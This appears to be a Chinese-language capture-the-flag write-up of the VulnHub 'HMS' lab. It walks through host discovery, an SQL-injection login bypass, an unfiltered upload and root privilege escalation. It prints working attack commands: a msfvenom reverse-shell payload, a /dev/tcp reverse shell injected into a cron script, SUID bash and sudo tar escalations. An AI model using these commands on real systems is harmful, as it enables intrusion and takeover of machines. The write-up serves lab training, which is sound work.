01.靶场介绍
靶场难度:简单
靶场地址:https://vulnhub.com/entry/hms-1,728/
02.信息收集
主机发现
netdiscover -i eth1 -r 192.168.43.0/24
端口扫描
nmap -sV -A -Pn -p1-65535 192.168.43.11
指纹识别
目录扫描
提示信息
Goggle 搜索一下,找到了源代码
源码下载地址:https://nikhilbhalerao.com/blog/open-source-clinic-management-system#google_vignette
代码审计环境搭建:
创建一个数据库,然后导入sql文件,配置好账号密码即可。
通过审计可以发现登录页面存在sql注入,且可以万能密码登录
SELECT * FROM admin WHERE loginid='" .$email . "' and password = '". $pass."'
首先去掉前端限制,把mail 类型删除或者更改为text,然后输入admin' or 1=1 # ,密码任意。登录成功。
这里没有找到上传点,直接上Seay 代码扫描找漏洞审计,发现存在几处上传,且没做过滤。
上传后可以成功访问
http://ds.hospitaltest.com/uploadImage/Logo/phpinfo.php
03.获取权限
从代码审计已经找到了上传点,接下来就是拿权限了。
http://192.168.43.11:7080/manage_website.php
找到了第一个flag, 发现还存在一个账号
04.权限提升
反弹shell 进行提取,这里没反弹成功。 查了一下发现是sh 链接到了 dash,而非 bash 。
msf 生成elf 木马,然后执行上线
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.43.223 LPORT=4444 -f elf -o 1.elf
使用Python生成一个功能更好的bash shell,然后查找一下SUID文件,发现可用文件
python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 -type f -exec ls -al {} ; 2>/dev/null
/usr/bin/bash -p
这里成功提权到eren 权限,查看home 目录下发现存在定时任务。但是是eren权限的定时任务,可以用来反弹一个eren 的 shell
echo "bash -c "bash -i >& /dev/tcp/192.168.43.223/8899 0>&1" " /home/eren/backup.sh或者echo "bash -c "/opt/lampp/htdocs/uploadImage/Logo/1.elf" " /home/eren/backup.sh
获取后,sudo 就可以看了,接着查询tar 提权。
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh提权后,查看flag
原文始发于微信公众号(贝雷帽SEC):NO.5 nivek 靶场
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论